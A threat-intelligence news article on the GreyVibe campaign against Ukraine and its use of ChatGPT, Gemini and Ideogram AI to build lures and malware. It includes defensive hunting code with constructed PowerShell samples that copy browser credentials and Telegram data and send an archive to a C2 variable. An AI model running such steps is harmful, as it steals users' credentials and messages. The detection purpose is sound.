GreyVibe Used ChatGPT, Gemini and Ideogram AI Across a Likely-Russian Ukraine Campaign
WithSecure has tied a likely-Russian threat cluster named GreyVibe to a Ukraine-focused campaign that uses ChatGPT, Gemini and Ideogram AI as productivity tooling across lures, malware and post-compromise operations.
GreyVibe is not a story about one Russia-aligned cluster. It is the fourth documented case in 2026 — alongside Kimsuky's HelloDoor, Google's first AI-developed zero-day in the wild, and the Germany-China AI-superhacker warning — that AI-as-attacker-tooling has crossed from research paper to operational tradecraft.
KYIV, UKRAINE — On May 29, 2026, the Finnish security firm WithSecure disclosed a likely-Russian threat cluster it tracks as GreyVibe, which has been targeting Ukrainian and Ukraine-related organisations in the military, government, civilian and business sectors since at least August 2025. The standout characteristic, per WithSecure's research, is that GreyVibe has used generative AI tools — specifically ChatGPT, Google Gemini and Ideogram AI — across every phase of its operations, from fake-website and phishing-lure generation to the development of custom malware and post-compromise tooling.
WithSecure says the link to a Russian-speaking operator is supported by the language used in the malware control panels, comments inside the code artefacts, and a command-and-control server clock configured to UTC+3 (Moscow time). The researchers emphasise that the activity "appears to align with Russian state interests" but stop short of confidently classifying GreyVibe as a nation-state operation — a hedge that is itself a piece of the story.
What Happened
On May 29, 2026, WithSecure published research naming GreyVibe — a previously untracked threat cluster that has been operating against Ukrainian and Ukraine-related organisations since at least August 2025 and was discovered by WithSecure researchers in January 2026. The targeting set spans military, government, civilian and business organisations, and the campaign's defining trait, in WithSecure's framing, is the breadth of generative-AI tooling threaded through it. The researchers say ChatGPT, Google Gemini and Ideogram AI have been used to generate detailed and realistic phishing lures and fake-website content, and that the cluster's custom obfuscators — tracked by WithSecure as LOOKVALPS, LOOKVALJS, DAYLIGHT and TEASOUP — together with a PowerShell-based remote-access trojan named LegionRelay were likely developed with the assistance of large language models.
LegionRelay is the operational centrepiece of WithSecure's writeup. The PowerShell RAT supports file theft, screenshot capture, browser credential theft, the exfiltration of Telegram and WhatsApp data, and the configuration of remote-desktop access on infected hosts — the standard post-compromise feature set of a modern espionage tool, with the difference that WithSecure assesses the code itself to have been produced with LLM assistance. The attribution language attached to GreyVibe is deliberately careful: Russian-language strings inside the malware control panels, comments in the code artefacts, and a command-and-control server clock configured to UTC+3 (Moscow time) lead the researchers to a Russian-speaking operator and an alignment with Russian state interests, but not to a confident nation-state classification.
WithSecure's Framing: A Glimpse of How Future Groups Will Operate
The most quoted line in WithSecure's disclosure is the framing of GreyVibe as a preview rather than an outlier. The researchers describe the cluster as a glimpse into how future cybercriminal and state-aligned groups will operate — not because the targeting or the post-compromise capabilities are exotic, but because the entire production pipeline behind them has been industrialised with public AI tools. Lures that read as native and on-context, obfuscators built faster than a small team could write by hand, a PowerShell RAT whose feature set was assembled with LLM help: each individual piece is recognisable from past espionage operations, but the speed and finish that AI assistance gives to the whole bundle is what WithSecure says is new. GreyVibe is, in their account, a working version of the operating model that defenders should expect to see more of.
ChatGPT, Gemini and Ideogram AI Are Being Used, Not Compromised
An important framing point for readers: GreyVibe is using public AI tools as productivity tooling, not exploiting or compromising them. The campaign's operators are users, paying or otherwise, of OpenAI's ChatGPT, Google's Gemini and Ideogram AI's image-generation service, and they use those services the way any ordinary user would: to draft text faster, to generate images for fake websites and, per WithSecure's analysis, to scaffold code for malware components. None of OpenAI, Google or Ideogram AI is the failure point in this story; the platforms have not been breached, and there is no allegation that their safety controls were evaded in any architecturally novel way. The failure mode sits at a different layer entirely: a sufficiently determined operator can route enough of an attack pipeline through general-purpose AI assistants that the marginal cost of producing high-quality lures and bespoke tooling falls dramatically, and there is currently no platform-level control that distinguishes that workflow from any other knowledge worker's.
GreyVibe Joins a Now-Documented Operational Cluster
GreyVibe is not the first AI-as-attacker-tooling case of 2026, and the more important framing is that it joins a documented operational cluster. The CyberSignal's earlier coverage of Kimsuky's PebbleDash variant with LLM-developed code comments in the HelloDoor malware established that a North Korea-aligned actor was already using LLMs to scaffold malware. Google GTIG's disclosure of the first AI-developed zero-day exploited in the wild for a 2FA bypass at mass scale moved the threshold further by showing AI being used to discover and weaponise a vulnerability, not just produce text. And Germany's BfV warning, drawn from China's Mythos and Glasswing programmes, that an AI-superhacker is on the near horizon is the strategic-intelligence version of the same finding. Read together with GreyVibe — and alongside the CyberSignal's same-day coverage of Kimsuky's HttpSpy backdoor against the South Korean military — at least four distinct actor profiles are now using generative AI as live operational tooling. The trend is multi-alignment and multi-actor, and it is no longer future-tense.
Scope and Impact
The immediate scope question — how many Ukrainian organisations have been touched by GreyVibe — is not in WithSecure's public disclosure, and this account does not invent one. What WithSecure does establish is the breadth of the targeting set across military, government, civilian and business sectors, and the duration of the operation, which has been running since at least August 2025. For Ukrainian and Ukraine-allied defenders, the relevant assumption is that any organisation with a plausible link to Ukrainian state interests is in the targeting universe, and that the activity has had nine months to develop before being publicly named.
The wider impact is the precedent GreyVibe sets for what an espionage-grade campaign now looks like when AI is part of the production pipeline. A Russia-aligned cluster — even one carrying the careful "likely Russian" hedge — using ChatGPT and Gemini for lures and Ideogram AI for fake-website imagery slots into the same year as ESET's October 2025 to March 2026 APT activity report cataloguing Sandworm, DyNoWiper and Lazarus operations and Microsoft's reporting on Kazuar / Secret Blizzard turning a Signal-Desktop foothold into a Russian nation-state botnet. The Russia-aligned espionage stack has not slowed; GreyVibe is its AI-enabled iteration.
What WithSecure deliberately does not say is also load-bearing. The researchers do not claim that GreyVibe is GRU, FSB or SVR, do not name a specific Russian service or unit, and explicitly note that they cannot confidently classify the cluster as a nation-state operation. The evidence — Russian-language panels and code comments, a UTC+3 C2 clock, alignment with Russian state interests in target selection — is consistent with a Russian-speaking operator and a state-aligned mission, but it is not, on its own, sufficient to graduate the cluster to a confident state attribution. That hedge should travel with every downstream description of GreyVibe; collapsing it into firm attribution would overstate what the evidence supports.
Response and Attribution
For SOC analysts at Ukrainian critical-infrastructure organisations and Ukraine-allied entities, brief the team on the specific telltales of LLM-generated phishing content as a triage heuristic: unnaturally clean phrasing in Ukrainian or Russian email lures, formulaic salutations, plausible-but-hallucinated context in the body, and overly well-structured copy that does not match the apparent sender's prior pattern. Hunt for the LegionRelay PowerShell RAT behaviours WithSecure documents (file theft, screenshot capture, browser-credential reads, Telegram and WhatsApp data exfiltration and RDP-setup activity); in practice that hunt depends on PowerShell script block logging (Event ID 4104) already being enabled across the estate, since a PowerShell RAT leaves little on disk to find otherwise. Treat any inbound Russia-aligned cluster activity as elevated through any active conflict window.
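A behaviour-class hunt over PowerShell script block logs, as an added example and not WithSecure's detection logic: it carries no GreyVibe or LegionRelay indicator, only generic .NET API, file-path and registry patterns that a PowerShell implementation of screenshot capture, browser-credential reads, Telegram/WhatsApp data access or RDP enablement tends to touch. It assumes Event ID 4104 logging is on and that events have been decoded to (host, ScriptBlockId, ScriptBlockText) tuples; long scripts arrive as several 4104 fragments sharing one ScriptBlockId, so fragments are reassembled before matching. The sample events are constructed. Requiring two or more behaviour classes in a single script keeps single-purpose admin tooling (an RDP-enablement script, a screenshot utility) out of the result.

```python
"""Hunt PowerShell script block logs (Event ID 4104) for combinations of
post-compromise behaviour classes. Added example; the patterns are generic,
not indicators from any vendor report, and the events below are constructed."""
import re
from collections import defaultdict

# Behaviour class -> case-insensitive regexes over the decoded script text.
BEHAVIOUR_PATTERNS = {
    "screenshot_capture": [
        r"System\.Drawing\.Bitmap", r"CopyFromScreen", r"Screen\]::PrimaryScreen",
    ],
    "browser_credential_read": [
        r"Login Data", r"Local State", r"ProtectedData\]::Unprotect",
        r"\blogins\.json\b", r"key4\.db",
    ],
    "messenger_data_access": [
        r"\\Telegram Desktop\\tdata", r"\\WhatsApp\\", r"msgstore",
    ],
    "rdp_enablement": [
        r"fDenyTSConnections", r"Remote Desktop Users",
        r"netsh\s+advfirewall.*remotedesktop", r"\bTermService\b",
    ],
}
COMPILED = {cls: [re.compile(p, re.I) for p in pats]
            for cls, pats in BEHAVIOUR_PATTERNS.items()}


def classify_script(text):
    """Return the set of behaviour classes with at least one pattern hit."""
    return {cls for cls, pats in COMPILED.items()
            if any(p.search(text) for p in pats)}


def hunt(events, min_classes=2):
    """events: iterable of (host, script_block_id, script_block_text).
    Fragments with the same (host, id) are joined before classification.
    Scripts showing >= min_classes distinct classes are returned, because
    any single class on its own is common in legitimate admin tooling."""
    by_script = defaultdict(list)
    for host, script_id, text in events:
        by_script[(host, script_id)].append(text)
    findings = {}
    for key, fragments in by_script.items():
        classes = classify_script("\n".join(fragments))
        if len(classes) >= min_classes:
            findings[key] = sorted(classes)
    return findings


# Constructed sample 4104 events: (host, ScriptBlockId, ScriptBlockText).
SAMPLE_EVENTS = [
    # Benign: a help-desk script that only enables RDP (one class).
    ("WS-017", "b1", r"Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -Name fDenyTSConnections -Value 0"),
    ("WS-017", "b1", r"Enable-NetFirewallRule -DisplayGroup 'Remote Desktop'"),
    # Suspicious: one script block, four fragments, four behaviour classes.
    ("WS-042", "c7", r"Add-Type -AssemblyName System.Drawing; $b = New-Object System.Drawing.Bitmap 1920,1080; $g = [System.Drawing.Graphics]::FromImage($b); $g.CopyFromScreen(0,0,0,0,$b.Size)"),
    ("WS-042", "c7", r"$ld = Join-Path $env:LOCALAPPDATA 'Google\Chrome\User Data\Default\Login Data'; Copy-Item $ld $env:TEMP"),
    ("WS-042", "c7", r'Compress-Archive -Path "$env:APPDATA\Telegram Desktop\tdata" -DestinationPath "$env:TEMP\t.zip"'),
    ("WS-042", "c7", r"Set-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server' fDenyTSConnections 0; Add-LocalGroupMember -Group 'Remote Desktop Users' -Member svc"),
    # Benign: a screenshot utility (one class).
    ("WS-003", "d2", r"Add-Type -AssemblyName System.Windows.Forms; $s = [System.Windows.Forms.Screen]::PrimaryScreen.Bounds"),
]

if __name__ == "__main__":
    for (host, sid), classes in hunt(SAMPLE_EVENTS).items():
        print(f"{host} script {sid}: {', '.join(classes)}")
```

The threshold is the tuning knob: `min_classes=1` turns the same logic into a noisy inventory of which hosts run which capability, useful for baselining before a hunt, while the default of two surfaces only scripts that combine capabilities the way a RAT does.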
For CISOs more broadly, GreyVibe is the moment to update threat models to assume that AI-as-attacker-tooling is documented operational tradecraft across at least four actor profiles this year (Kimsuky's HelloDoor, the Google AI-developed zero-day, the BfV warning drawn from China's Mythos and Glasswing programmes, and now GreyVibe) and to pre-script an "LLM artefacts in malware analysis" workflow for the SOC. The hunting signals that workflow should formalise include emoji-laden or stylistically uniform code comments, hallucinated API references inside obfuscators or loaders, and unusually well-edited phishing copy that does not match a sender's prior cadence. None of these is conclusive on its own; together they are an increasingly reliable family of indicators.
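A scorer for the code-side signals named above, as an added example and not WithSecure's methodology: it counts emoji in line comments, measures how uniformly the comments are written as full sentences, and lists Verb-Noun cmdlet references that are absent from a known-cmdlet inventory, which is where a hallucinated API would show up. The inventory here is a small constructed allowlist; on a real analysis host it would be generated with `Get-Command` from a clean reference image. The thresholds are assumptions, the three PowerShell samples are constructed, and the invented cmdlet `Send-WebPayload` in the second sample exists only to exercise the inventory check. The third sample shows why no single signal is conclusive: tidy, uniform comments alone are also how a careful human writes.

```python
"""Score code comments and cmdlet references for artefacts associated with
LLM-assisted authorship. Added example with assumed thresholds; the
cmdlet inventory and the three samples are constructed."""
import re

EMOJI_RE = re.compile("[\U0001F300-\U0001FAFF\u2600-\u27BF]")
COMMENT_RE = re.compile(r"^\s*#\s?(.*)$")          # PowerShell line comments
CMDLET_RE = re.compile(r"\b([A-Z][a-z]+-[A-Z][A-Za-z]+)\b")  # Verb-Noun tokens

# Constructed subset of a real-host inventory (build from Get-Command in practice).
KNOWN_CMDLETS = {
    "Join-Path", "Copy-Item", "Compress-Archive", "Set-ItemProperty",
    "Enable-NetFirewallRule", "Add-LocalGroupMember", "Invoke-WebRequest",
    "Get-Process", "Add-Type", "New-Object",
}


def comments(src):
    """Non-empty full-line comments, marker stripped."""
    return [m.group(1).rstrip() for line in src.splitlines()
            if (m := COMMENT_RE.match(line)) and m.group(1).strip()]


def emoji_ratio(cs):
    """Fraction of comments containing at least one emoji."""
    return sum(1 for c in cs if EMOJI_RE.search(c)) / len(cs) if cs else 0.0


def uniformity(cs):
    """Fraction of comments written as complete sentences (leading symbols
    ignored, capitalised, terminated with a period). Hand-written comments
    usually mix fragments, TODOs and sentences; a value near 1.0 over several
    comments is a weak signal on its own. Needs at least three comments."""
    if len(cs) < 3:
        return 0.0
    ok = sum(1 for c in cs
             if re.sub(r"^\W+", "", c)[:1].isupper() and c.endswith("."))
    return ok / len(cs)


def unknown_cmdlets(src, inventory):
    """Verb-Noun tokens not present in the inventory, for analyst review."""
    return sorted({t for t in CMDLET_RE.findall(src) if t not in inventory})


def score(src, inventory=KNOWN_CMDLETS):
    """Return (number of signals firing, per-signal detail)."""
    cs = comments(src)
    signals = {
        "emoji_comments": emoji_ratio(cs) > 0.0,        # assumed threshold
        "uniform_comments": uniformity(cs) >= 0.9,     # assumed threshold
        "unknown_cmdlets": unknown_cmdlets(src, inventory),
    }
    hits = sum([signals["emoji_comments"], signals["uniform_comments"],
                bool(signals["unknown_cmdlets"])])
    return hits, signals


# Constructed sample 1: terse hand-written style, real cmdlets only.
HAND_WRITTEN = r"""
# grab chrome creds
$ld = Join-Path $env:LOCALAPPDATA 'Google\Chrome\User Data\Default\Login Data'
Copy-Item $ld $env:TEMP   # TODO handle locked file
# zip it
Compress-Archive -Path "$env:TEMP\Login Data" -DestinationPath "$env:TEMP\o.zip"
"""

# Constructed sample 2: emoji step comments, uniform sentences, and a cmdlet
# (Send-WebPayload) that does not exist in the inventory.
GENERATED_STYLE = r"""
# 🔍 Step 1: Collect the Chrome credential database.
$ld = Join-Path $env:LOCALAPPDATA 'Google\Chrome\User Data\Default\Login Data'
# 📦 Step 2: Stage the file for exfiltration.
Copy-Item $ld $env:TEMP
# 🚀 Step 3: Compress and send the archive.
Compress-Archive -Path "$env:TEMP\Login Data" -DestinationPath "$env:TEMP\o.zip"
Send-WebPayload -Uri $c2 -Body "$env:TEMP\o.zip"
"""

# Constructed sample 3: uniform comments but nothing else; one weak signal.
UNIFORM_ONLY = r"""
# Enable Remote Desktop on this host.
Set-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server' fDenyTSConnections 0
# Open the firewall group for it.
Enable-NetFirewallRule -DisplayGroup 'Remote Desktop'
# Add the service account to the RDP group.
Add-LocalGroupMember -Group 'Remote Desktop Users' -Member svc
"""

if __name__ == "__main__":
    for name, src in [("hand_written", HAND_WRITTEN),
                      ("generated_style", GENERATED_STYLE),
                      ("uniform_only", UNIFORM_ONLY)]:
        print(name, score(src))
```

Treat the hit count as a triage priority, not a verdict: an `unknown_cmdlets` entry may be a module the reference host lacks, and the comment heuristics are defeated trivially by an operator who strips comments before deployment.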
For threat-hunting teams, the immediate operational task is to ingest any GreyVibe-named indicators of compromise WithSecure publishes — particularly anything tied to LOOKVALPS, LOOKVALJS, DAYLIGHT, TEASOUP and LegionRelay — and to write YARA and detection logic for each as it lands. On the attribution side, the honest posture is to preserve the "likely Russian" hedge in internal reporting and downstream briefings; the evidence supports a Russian-speaking, state-aligned operator and no more, and overstating that finding would make the rest of the threat picture harder to maintain.
The CyberSignal Analysis
Signal 01 — AI-as-Attacker-Tooling Is Now an Operational Cluster, Not a Single-Actor Story
The mistake to avoid with GreyVibe is treating it as one cluster's story. By May 29, 2026, the AI-as-attacker-tooling pattern has at least four documented profiles attached to it: Kimsuky's HelloDoor with LLM-written code comments, Google GTIG's first AI-developed zero-day exploited in the wild, the German intelligence warning drawn from China's Mythos and Glasswing programmes, and now WithSecure's GreyVibe disclosure. Each comes from a different alignment (North Korea, an actor left unnamed in the zero-day reporting, China and likely Russia), and each touches a different part of the attack chain, from malware code to vulnerability discovery to lure production. Read together, they describe a trend that is multi-actor, multi-alignment and multi-stage. The implication for defender programmes is that AI-tooled tradecraft is no longer something to plan for; it is something to detect for, today.
Signal 02 — Preserve the "Likely Russian" Hedge — It Is Doing Real Work
WithSecure's careful attribution language is the most underrated detail in the GreyVibe disclosure. The researchers say the activity "appears to align with Russian state interests" and that the language artefacts, code comments and UTC+3 C2 clock point to a Russian-speaking operator — but they explicitly do not classify the cluster as a confirmed nation-state operation. That hedge is not a hedge for its own sake. It is a statement that the evidence supports a Russian-speaking, state-aligned actor and stops short of supporting a specific service identification. Downstream coverage that quietly upgrades "likely Russian" to "Russian state-sponsored" or names a service GreyVibe is not, strictly, evidenced to be is the kind of drift that erodes the broader Russia-attribution picture over time. The discipline GreyVibe asks of its readers is to keep the hedge in place even when it is rhetorically tempting to drop it.
Signal 03 — The Failure Mode Is the Workflow, Not the AI Platform
The framing trap with GreyVibe is to read it as a story about ChatGPT, Gemini and Ideogram AI failing. They have not. The platforms have not been compromised, their guardrails have not been architecturally bypassed in a way the disclosure surfaces, and there is no allegation that any of the three vendors enabled this campaign. What GreyVibe shows is that a sufficiently motivated operator can route enough of an attack pipeline through general-purpose AI assistants — lure drafting, image generation for fake websites, code scaffolding for obfuscators and a PowerShell RAT — that the marginal cost of producing a polished espionage operation against Ukraine falls dramatically. The failure mode lives at the workflow layer, and there is currently no platform-level control that distinguishes "writing a polished phishing email in Ukrainian" from "writing a polished customer-success email in Ukrainian." That, more than any one cluster's tradecraft, is the structural problem GreyVibe makes visible.